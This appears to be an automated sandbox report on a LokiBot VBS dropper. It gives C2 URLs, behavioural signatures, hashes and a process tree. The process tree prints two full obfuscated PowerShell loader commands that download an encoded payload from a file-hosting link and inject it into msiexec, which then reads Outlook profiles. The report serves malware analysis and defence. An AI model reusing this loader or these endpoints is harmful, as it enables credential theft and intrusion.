Analysis
-
max time kernel
144s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
02-10-2024 05:22
Static task
static1
Behavioral task
behavioral1
Sample
12cf262af8e265c0013ba1e06bfe89b0e9b65acffe82f2f54121dcd434c4b394.vbs
Resource
win7-20240708-en
General
-
Target
12cf262af8e265c0013ba1e06bfe89b0e9b65acffe82f2f54121dcd434c4b394.vbs
-
Size
73KB
-
MD5
5cc7cf5b0814e2f80bad4c4e85831e96
-
SHA1
93ed4011fc57034804feb5bd8ea61c6cf7b30cce
-
SHA256
12cf262af8e265c0013ba1e06bfe89b0e9b65acffe82f2f54121dcd434c4b394
-
SHA512
f9834c708ff8af1734b345f156d7abcebc8675f6e481fe65ac4512578d71cac11a3eba9779f2708a990858da9dce32c2e8416c967b77701991d7692393fa8c09
-
SSDEEP
1536:s+0UNtNTLbVAumhqIkeF+3e+2Tyf4hHKMHAqLkf:s+5LfAFh62TS4hKf
Malware Config
Extracted
lokibot
http://137.184.191.215/index.php/10899
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Blocklisted process makes network request 11 IoCs
Processes:
powershell.exemsiexec.exeflow pid process 5 2124 powershell.exe 7 2124 powershell.exe 9 1240 msiexec.exe 11 1240 msiexec.exe 13 1240 msiexec.exe 15 1240 msiexec.exe 16 1240 msiexec.exe 17 1240 msiexec.exe 18 1240 msiexec.exe 19 1240 msiexec.exe 30 1240 msiexec.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook msiexec.exe -
Processes:
powershell.exepowershell.exepid process 2124 powershell.exe 2280 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Processes:
powershell.exepowershell.exepid process 2124 powershell.exe 2280 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid process 1240 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid process 2280 powershell.exe 1240 msiexec.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2280 set thread context of 1240 2280 powershell.exe msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepid process 2124 powershell.exe 2280 powershell.exe 2280 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2280 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exemsiexec.exedescription pid process Token: SeDebugPrivilege 2124 powershell.exe Token: SeDebugPrivilege 2280 powershell.exe Token: SeDebugPrivilege 1240 msiexec.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2520 wrote to memory of 2124 2520 WScript.exe powershell.exe PID 2520 wrote to memory of 2124 2520 WScript.exe powershell.exe PID 2520 wrote to memory of 2124 2520 WScript.exe powershell.exe PID 2280 wrote to memory of 1240 2280 powershell.exe msiexec.exe PID 2280 wrote to memory of 1240 2280 powershell.exe msiexec.exe PID 2280 wrote to memory of 1240 2280 powershell.exe msiexec.exe PID 2280 wrote to memory of 1240 2280 powershell.exe msiexec.exe PID 2280 wrote to memory of 1240 2280 powershell.exe msiexec.exe PID 2280 wrote to memory of 1240 2280 powershell.exe msiexec.exe PID 2280 wrote to memory of 1240 2280 powershell.exe msiexec.exe PID 2280 wrote to memory of 1240 2280 powershell.exe msiexec.exe PID 2280 wrote to memory of 1240 2280 powershell.exe msiexec.exe -
outlook_office_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook msiexec.exe -
outlook_win_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook msiexec.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12cf262af8e265c0013ba1e06bfe89b0e9b65acffe82f2f54121dcd434c4b394.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fogydom=(Dioptres 'Mildh$FysikGDiffeL SusloWholiBMidlaaS,orsLIndis:objecDForbri,rlaaAHogowpSqua.HLuftlEI.surmChapeeAe,opTdyngerHan,ki ,fpaCBalal= SkrinGaddieTakstW Labi-Icer oHybriB herpJMorolEPenwoCE,ectTLangf VirakSFors YForb.SPreaxTPlataE Weekm Epic. BrkeNAgat,eAf,erTDivin. uiriWSoa aE roftBOpparCLocomLTransI,okuseO sigNpast.TDenti ');Unhandled ($Fogydom);Unhandled (Dioptres 'A ago$Assesd.yrani Pantaen.ompInninh Erine blegmOp raeHarmatAssocrNonspi,irkucviol .RegulHNbsune tabuaTr wld Flive portrDightsPisto[ T.ig$ neigJPermio B,drr UndedTra ksSalgsk SafroBrandrM ndipdebete Anstn HekssSekon]Betnk=Cardi$Spi tP .illhTungeoRe enrIndbloC,mpunKalk.oIce pmLestsyPreso ');$Tailwind=Dioptres ' ilde$ Upstd retriSikkeac bolp FatahSuffleSpun mStudeehoo.rtP ilor obbi ndelcAnfre.BesegDSlaveo Bev,wse denSpejllSlagtoKundeaUniondvingeFParaliMar ylSix,eeCadav(Ligbr$PapirP Billa ienetFuldkiSemipeGarg nU.pertrom nenick rFono.n H jseJaywasOve.b,Intra$ MeloDRterseSlimilFar,ii ImmekInimiaHjrest UndeelevnerRaphaeUdtryrPaa k) Fo b ';$Delikaterer=$Gendigtende;Unhandled (Dioptres 'Gaunt$Cons,guncouLHummaoforunBInhalaInt.rLspros:M,ldeSforfek gav lDimenvferieElibecSTilsk= co,f(DecimT .ndbeUlvefSSagamTelvil-TetraPAfvrgAC midt Grunh Node lave$S rikDA rime hoklPhiloiDalstKBesaaA AlbeTN ingeAgonirKonkre .nprrTypeg)Deput ');while (!$Sklves) {Unhandled (Dioptres 'Paryk$ Indkgbattll SkatoTheribWarluaN.dstlafble: Mir Acancef PsycsTolyltAflsetBob seBardelVitiasChromeJulek=Indlg$LudvitBeklirSusp.uSo tseAurig ') ;Unhandled $Tailwind;Unhandled (Dioptres ' PjasSMedict BltuaAnkusrinvestU bar-CamatSReplil adseeNondiePalmepAfgre Abel4Togvo ');Unhandled (Dioptres 'Studd$ FourgNondelCrut o Ruinb Trmaa Do xlIntel:SamhaSFi,erkRem.tl HomevTripteAf ensAbonn= Kolo(.odgaT ZabaeGasops BesttDishl-ReimbPhemola RayatN elshImp,n Rem s$brnebDSpleneCasqulP ioriHoeinkBnkbaaOba ntAntedeIntenrSkr leAfhenrSn sc) ave ') ;Unhandled (Dioptres 'Ke.li$ Bridg PennlG,ffeoSterebInfumaThou,lBlowb:vvninEDrlu xIndtrtSociarChurcoFosf.vOmn.veKoftgrSo set.perae.nsfodDeten=Kimri$ Anstg.inualstyfuoForstbSterca Pr,il Chef:MultiSShockaArchfmCutinv acedioverit erbet ortbiNe icgU.skrhBrandeStru,dFlngns ilkesExtinp liter ookgLecitsep.tamRad.kaTeentaChenilKolon+Uds.e+Begle%Burmi$Me,alSlegiot F rea Samtn RelidDeerfsOvatoe UngedHelveeGenne.esotecBoa,do BarbuSem.pnCabostfocus ') ;$Patienternes=$Standsede[$Extroverted];}$Senehinderne=336660;$Dihydrocuprin=31885;Unhandled (Dioptres 'Jabbe$BremsgKam kl LawmotelefbAabena esslCessi: Tra F eparoAll,srBe etoIrokevProleeQu,ndrkarrebCybe jp.akleSex,id rerse N,ncsPle,r orbe=cyclo CypseGTyksteAssi tTelef-StvstCSp vvosquibnau ictSa.eleAuricnPectitender Trest$ObserDSkovgecentelkrigsiPptnhkTekstaIdealt s mieO angrBilfreWass rHaand ');Unhandled (Dioptres ' Stal$HalshgSkyggl uebloKongub Panga leiglg.ppe:JonbySRe ittSterea Nejsm irebkUnderoPrtenr Enc,tPhy ieStencnForeseDe mosAmtsr Armer=Vakan Plomb[CastiSGymnaySammesTry btPyrame Lovmm Land.Cau.iC UnseoForbrnWombsv ilineBaller Eskot Vild] edbr: Indp:NedlaFRubber KopeoPo.ypm HeliBTelega Sp.esAlterePukle6Ana y4Und rSNoncotDo rirT leaiBroomnw odsgNs et( ,ank$ProtoF ikeoOverfrAbidjoFremmvPiggeeTr nsrDairybAc orjOver eOvenldTrikieMea es Bubb),iske ');Unhandled (Dioptres ' Di p$ rogvgAn lll Bnsko F.ndbSysseaAverhlCacot:TyndeUVagtvnKabarfP rliaSubresphyl tOutfiiResy nFreelgHfter Pirri=Ambus Kvind[ KobbS Dre yPsyk s A.frtArbite allumdilec.Hol oTcircueAntilx Geort Foru.DiablEGuimpn SvvecEksh.oSnyltdTriariBacilnBaha gHavfi] Gewg:Bakte:nul,iAunparS T.ggC ictiIDisceIOvert.helb GSklveeSkidttEsperSVilj tPiranr AvneiProv n Fre gLreri(,ynov$ hoyaS .tortEffu,acarbomTravek rawoTapetr QuadtGringe enudnG arreSaudis Aver) Leuc ');Unhandled (Dioptres 'Acond$Hum lgTricylAlfero,entabOverpaBodysl arco:I triCRhip.rFertiiOverhsEnt,rpValgreUbrugnF ldbi OvernCere,gIn um= Apol$PiragUStrmpn Gramf Sur,aExtrasVariat Pas iUndernEntopgMatr .MetazsTip iuAssyrb Studs schat StrorKamtaiFiorinplaybgMet,m(Re.en$ SyedSMariteFremfn SalteUnderhgreasi AxotnFreewd ,orseA.acarOtteon ho.eeMurd.,cec d$ForvaDTeodoiStav,hTrosiyacci dSkumprTarpioZaibacSulcauDecrepAtticrRefeeiAfst nTorta)Produ ');Unhandled $Crispening;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fogydom=(Dioptres 'Mildh$FysikGDiffeL SusloWholiBMidlaaS,orsLIndis:objecDForbri,rlaaAHogowpSqua.HLuftlEI.surmChapeeAe,opTdyngerHan,ki ,fpaCBalal= SkrinGaddieTakstW Labi-Icer oHybriB herpJMorolEPenwoCE,ectTLangf VirakSFors YForb.SPreaxTPlataE Weekm Epic. BrkeNAgat,eAf,erTDivin. uiriWSoa aE roftBOpparCLocomLTransI,okuseO sigNpast.TDenti ');Unhandled ($Fogydom);Unhandled (Dioptres 'A ago$Assesd.yrani Pantaen.ompInninh Erine blegmOp raeHarmatAssocrNonspi,irkucviol .RegulHNbsune tabuaTr wld Flive portrDightsPisto[ T.ig$ neigJPermio B,drr UndedTra ksSalgsk SafroBrandrM ndipdebete Anstn HekssSekon]Betnk=Cardi$Spi tP .illhTungeoRe enrIndbloC,mpunKalk.oIce pmLestsyPreso ');$Tailwind=Dioptres ' ilde$ Upstd retriSikkeac bolp FatahSuffleSpun mStudeehoo.rtP ilor obbi ndelcAnfre.BesegDSlaveo Bev,wse denSpejllSlagtoKundeaUniondvingeFParaliMar ylSix,eeCadav(Ligbr$PapirP Billa ienetFuldkiSemipeGarg nU.pertrom nenick rFono.n H jseJaywasOve.b,Intra$ MeloDRterseSlimilFar,ii ImmekInimiaHjrest UndeelevnerRaphaeUdtryrPaa k) Fo b ';$Delikaterer=$Gendigtende;Unhandled (Dioptres 'Gaunt$Cons,guncouLHummaoforunBInhalaInt.rLspros:M,ldeSforfek gav lDimenvferieElibecSTilsk= co,f(DecimT .ndbeUlvefSSagamTelvil-TetraPAfvrgAC midt Grunh Node lave$S rikDA rime hoklPhiloiDalstKBesaaA AlbeTN ingeAgonirKonkre .nprrTypeg)Deput ');while (!$Sklves) {Unhandled (Dioptres 'Paryk$ Indkgbattll SkatoTheribWarluaN.dstlafble: Mir Acancef PsycsTolyltAflsetBob seBardelVitiasChromeJulek=Indlg$LudvitBeklirSusp.uSo tseAurig ') ;Unhandled $Tailwind;Unhandled (Dioptres ' PjasSMedict BltuaAnkusrinvestU bar-CamatSReplil adseeNondiePalmepAfgre Abel4Togvo ');Unhandled (Dioptres 'Studd$ FourgNondelCrut o Ruinb Trmaa Do xlIntel:SamhaSFi,erkRem.tl HomevTripteAf ensAbonn= Kolo(.odgaT ZabaeGasops BesttDishl-ReimbPhemola RayatN elshImp,n Rem s$brnebDSpleneCasqulP ioriHoeinkBnkbaaOba ntAntedeIntenrSkr leAfhenrSn sc) ave ') ;Unhandled (Dioptres 'Ke.li$ Bridg PennlG,ffeoSterebInfumaThou,lBlowb:vvninEDrlu xIndtrtSociarChurcoFosf.vOmn.veKoftgrSo set.perae.nsfodDeten=Kimri$ Anstg.inualstyfuoForstbSterca Pr,il Chef:MultiSShockaArchfmCutinv acedioverit erbet ortbiNe icgU.skrhBrandeStru,dFlngns ilkesExtinp liter ookgLecitsep.tamRad.kaTeentaChenilKolon+Uds.e+Begle%Burmi$Me,alSlegiot F rea Samtn RelidDeerfsOvatoe UngedHelveeGenne.esotecBoa,do BarbuSem.pnCabostfocus ') ;$Patienternes=$Standsede[$Extroverted];}$Senehinderne=336660;$Dihydrocuprin=31885;Unhandled (Dioptres 'Jabbe$BremsgKam kl LawmotelefbAabena esslCessi: Tra F eparoAll,srBe etoIrokevProleeQu,ndrkarrebCybe jp.akleSex,id rerse N,ncsPle,r orbe=cyclo CypseGTyksteAssi tTelef-StvstCSp vvosquibnau ictSa.eleAuricnPectitender Trest$ObserDSkovgecentelkrigsiPptnhkTekstaIdealt s mieO angrBilfreWass rHaand ');Unhandled (Dioptres ' Stal$HalshgSkyggl uebloKongub Panga leiglg.ppe:JonbySRe ittSterea Nejsm irebkUnderoPrtenr Enc,tPhy ieStencnForeseDe mosAmtsr Armer=Vakan Plomb[CastiSGymnaySammesTry btPyrame Lovmm Land.Cau.iC UnseoForbrnWombsv ilineBaller Eskot Vild] edbr: Indp:NedlaFRubber KopeoPo.ypm HeliBTelega Sp.esAlterePukle6Ana y4Und rSNoncotDo rirT leaiBroomnw odsgNs et( ,ank$ProtoF ikeoOverfrAbidjoFremmvPiggeeTr nsrDairybAc orjOver eOvenldTrikieMea es Bubb),iske ');Unhandled (Dioptres ' Di p$ rogvgAn lll Bnsko F.ndbSysseaAverhlCacot:TyndeUVagtvnKabarfP rliaSubresphyl tOutfiiResy nFreelgHfter Pirri=Ambus Kvind[ KobbS Dre yPsyk s A.frtArbite allumdilec.Hol oTcircueAntilx Geort Foru.DiablEGuimpn SvvecEksh.oSnyltdTriariBacilnBaha gHavfi] Gewg:Bakte:nul,iAunparS T.ggC ictiIDisceIOvert.helb GSklveeSkidttEsperSVilj tPiranr AvneiProv n Fre gLreri(,ynov$ hoyaS .tortEffu,acarbomTravek rawoTapetr QuadtGringe enudnG arreSaudis Aver) Leuc ');Unhandled (Dioptres 'Acond$Hum lgTricylAlfero,entabOverpaBodysl arco:I triCRhip.rFertiiOverhsEnt,rpValgreUbrugnF ldbi OvernCere,gIn um= Apol$PiragUStrmpn Gramf Sur,aExtrasVariat Pas iUndernEntopgMatr .MetazsTip iuAssyrb Studs schat StrorKamtaiFiorinplaybgMet,m(Re.en$ SyedSMariteFremfn SalteUnderhgreasi AxotnFreewd ,orseA.acarOtteon ho.eeMurd.,cec d$ForvaDTeodoiStav,hTrosiyacci dSkumprTarpioZaibacSulcauDecrepAtticrRefeeiAfst nTorta)Produ ');Unhandled $Crispening;"1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\syswow64\msiexec.exe"C:\Windows\syswow64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1240
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1506706701-1246725540-2219210854-1000\0f5007522459c86e95ffcc62f32308f1_62dc4f69-4699-4b35-9f5c-cc69254f52a3
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1506706701-1246725540-2219210854-1000\0f5007522459c86e95ffcc62f32308f1_62dc4f69-4699-4b35-9f5c-cc69254f52a3
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8TFL6U22G8706260EOW3.temp
Filesize7KB
MD5e99d21fa1329c0a7563f4ab4e82f61d5
SHA16573c16373daf19b9163a8db4e8627a979345102
SHA2563668a5372deba7251a76b1b841e4818466a6e236cef5754b5ab73b185430e6f9
SHA512b17c0be2a8040baaf61ea4b2b8fbfef1a1706c888a1a1840d7a43692f27f975e2ac28511d2217f12f4d34a6069d8d9694f53469d88abfd4a573d97ac0db3b789
-
Filesize
479KB
MD5c5139b3748a3d2e8508528467db482e6
SHA1e5f28f16eb9afc3d80cf0998994b5d705d319cf7
SHA2563e716cb2d2058cceb704989730f24517aa7ebe00b09fec07c2452b3dff6e152b
SHA512fce4bd2e64097f5d1f65763732601b43db2e82cb7be362a5775f1aadc293cbc107361ef2d2e8c6e29e1197ca03055e210982817b1e49d8b401603414e7002ff7